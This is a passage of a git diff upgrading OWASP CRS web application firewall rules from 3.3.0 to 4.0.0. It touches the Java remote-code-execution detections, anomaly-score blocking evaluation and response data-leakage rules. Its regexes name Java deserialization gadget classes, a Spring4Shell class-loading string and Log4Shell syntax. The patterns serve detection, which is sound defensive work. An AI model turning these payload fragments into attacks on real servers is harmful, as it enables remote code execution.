setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # Detecting possible base64 text to match encoded magic bytes \xac\xed\x00\x05 with padding encoded in base64 strings are rO0ABQ KztAAU Cs7QAF SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ @@ -190,7 +303,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES "id:944210,\ phase:2,\ block,\ - log,\ msg:'Magic bytes Detected Base64 Encoded, probable java serialization in use',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -201,10 +313,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ "@rx (?:clonetransformer|forclosure|instantiatefactory|instantiatetransformer|invokertransformer|prototypeclonefactory|prototypeserializationfactory|whileclosure|getproperty|filewriter|xmldecoder)" \ @@ -212,7 +324,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,t:lowercase,\ - log,\ msg:'Remote Command Execution: Java serialization (CVE-2015-4852)',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -223,10 +334,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] @@ -237,7 +348,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:lowercase,\ - log,\ msg:'Remote Command Execution: Suspicious Java method detected',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -248,17 +358,41 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This rule is also triggered by the following exploit(s): +# - https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/ +# +SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ + "@rx (?:class\.module\.classLoader\.resources\.context\.parent\.pipeline|springframework\.context\.support\.FileSystemXmlApplicationContext)" \ + "id:944260,\ + phase:2,\ + block,\ + t:urlDecodeUni,\ + msg:'Remote Command Execution: Malicious class-loading payload',\ + logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # # Interesting keywords for possibly RCE on vulnerable classes and methods base64 encoded # Keywords = ['runtime', 'processbuilder', 'clonetransformer', 'forclosure', 'instantiatefactory', 'instantiatetransformer', 'invokertransformer', 'prototypeclonefactory', 'prototypeserializationfactory', 'whileclosure'] @@ -273,7 +407,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,\ - log,\ msg:'Base64 encoded string matched suspicious keyword',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -284,18 +417,46 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # +# This is a stricter sibling of 944150. +# It simply checks for the existence of `${`, taking into account the same encoding evasions +# as 944150. +# +# Regular expression generated from regex-assembly/944152.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 944152 +# +SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)" \ + "id:944152,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,t:jsDecode,t:htmlEntityDecode,\ + log,\ + msg:'Potential Remote Command Execution: Log4j / Log4shell',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/6',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # -= Paranoia Levels Finished =- diff --git a/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/REQUEST-949-BLOCKING-EVALUATION.conf index 5f370a1664..2358df934e 100644 --- a/rules/REQUEST-949-BLOCKING-EVALUATION.conf +++ b/rules/REQUEST-949-BLOCKING-EVALUATION.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -11,117 +12,207 @@ # -= Paranoia Level 0 (empty) =- (apply unconditionally) # -# Summing up the anomaly score. +# Summing up the blocking and detection anomaly scores in phase 1 +# even when early blocking is disabled, we need to sum up the scores in phase 1 +# this prevents bugs in phase 5 if Apache skips phases because of error handling +# See: https://github.com/coreruleset/coreruleset/issues/2319#issuecomment-1047503932 -# NOTE: tx.anomaly_score should not be set initially, but masking would lead to difficult bugs. -# So we add to it. -SecRule TX:PARANOIA_LEVEL "@ge 1" \ +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ + "id:949052,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ + "id:949152,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" + +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ + "id:949053,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ + "id:949153,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" + +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ + "id:949054,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ + "id:949154,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" + +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ + "id:949055,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ + "id:949155,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" + +# at start of phase 2, we reset the aggregate scores to 0 to prevent duplicate counting of per-PL scores +# this is necessary because the per-PL scores are counted across phases +SecAction \ + "id:949059,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.blocking_inbound_anomaly_score=0'" +SecAction \ + "id:949159,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=0'" + +# Summing up the blocking and detection anomaly scores in phase 2 + +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ "id:949060,\ phase:2,\ pass,\ t:none,\ nolog,\ - setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl1}'" + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ + "id:949160,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" -SecRule TX:PARANOIA_LEVEL "@ge 2" \ +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ "id:949061,\ phase:2,\ pass,\ t:none,\ nolog,\ - setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl2}'" + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ + "id:949161,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" -SecRule TX:PARANOIA_LEVEL "@ge 3" \ +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ "id:949062,\ phase:2,\ pass,\ t:none,\ nolog,\ - setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl3}'" + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ + "id:949162,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" -SecRule TX:PARANOIA_LEVEL "@ge 4" \ +SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ "id:949063,\ phase:2,\ pass,\ t:none,\ nolog,\ - setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl4}'" + setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ + "id:949163,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecMarker "BEGIN-REQUEST-BLOCKING-EVAL" -# These rules use the anomaly score settings specified in the 10 config file. -# You should also set the desired disruptive action (deny, redirect, etc...). # -# -=[ IP Reputation Checks ]=- -# -# Block based on variable IP.REPUT_BLOCK_FLAG and TX.DO_REPUT_BLOCK +# -=[ Anomaly Mode: Overall Transaction Anomaly Score ]=- # -SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \ - "id:949100,\ - phase:2,\ + +# if early blocking is active, check threshold in phase 1 +SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ + "id:949111,\ + phase:1,\ deny,\ - log,\ - msg:'Request Denied by IP Reputation Enforcement',\ - logdata:'Previous Block Reason: %{ip.reput_block_reason}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ + t:none,\ + msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ + tag:'anomaly-evaluation',\ + ver:'OWASP_CRS/4.0.0',\ chain" - SecRule TX:DO_REPUT_BLOCK "@eq 1" \ - "setvar:'tx.inbound_anomaly_score=%{tx.anomaly_score}'" + SecRule TX:EARLY_BLOCKING "@eq 1" -# -# -=[ Anomaly Mode: Overall Transaction Anomaly Score ]=- -# -SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ +# always check threshold in phase 2 +SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ "id:949110,\ phase:2,\ deny,\ t:none,\ - log,\ - msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.ANOMALY_SCORE})',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-generic',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.inbound_anomaly_score=%{tx.anomaly_score}'" - - + msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ + tag:'anomaly-evaluation',\ + ver:'OWASP_CRS/4.0.0'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-950-DATA-LEAKAGES.conf b/rules/RESPONSE-950-DATA-LEAKAGES.conf index c34607ecc0..dec60c0bf9 100644 --- a/rules/RESPONSE-950-DATA-LEAKAGES.conf +++ b/rules/RESPONSE-950-DATA-LEAKAGES.conf @@ -1,16 +1,21 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -# The paranoia level skip rules 950020, 950021 and 950022 have odd -# numbers not in sync with other paranoia level skip rules in other -# files. This is done to avoid rule id collisions with CRSv2. -# This is also true for rule 950130. +# We reused paranoia level skip rules 950010, 950011, and 950018. +# These rule identifiers were in use in CRSv2, so we used different +# identifiers in CRSv3 to avoid conflicts (950020, 950021 and 950022). +# In CRSv4, for the sake of a consistent structure, we use these +# identifiers again, so that the skip rules of PL can be defined in the +# same way for all files. +# Rule id 950130 has been kept - this ID also was introduced at first +# rule to avoid the collision. # # -= Paranoia Level 0 (empty) =- (apply unconditionally) @@ -18,23 +23,23 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:950020,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:950021,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Directory Listing ]=- # -SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Index of|>\[To Parent Directory\]<\/[Aa]>
)" \ +SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Index of|>\[To Parent Directory\]
)" \ "id:950130,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Directory Listing',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -43,11 +48,9 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Inde tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54/127',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" # # -=[ CGI Source Code Leakage ]=- @@ -68,7 +71,7 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ capture,\ t:none,\ msg:'CGI source code leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -77,17 +80,15 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # # @@ -95,12 +96,12 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,skipAf # SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ "id:950100,\ - phase:4,\ + phase:3,\ block,\ capture,\ t:none,\ msg:'The Application Returned a 500-Level Status Code',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -109,26 +110,24 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:950022,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf index dbba2d7780..37d58d16ef 100644 --- a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf +++ b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,19 +14,19 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" 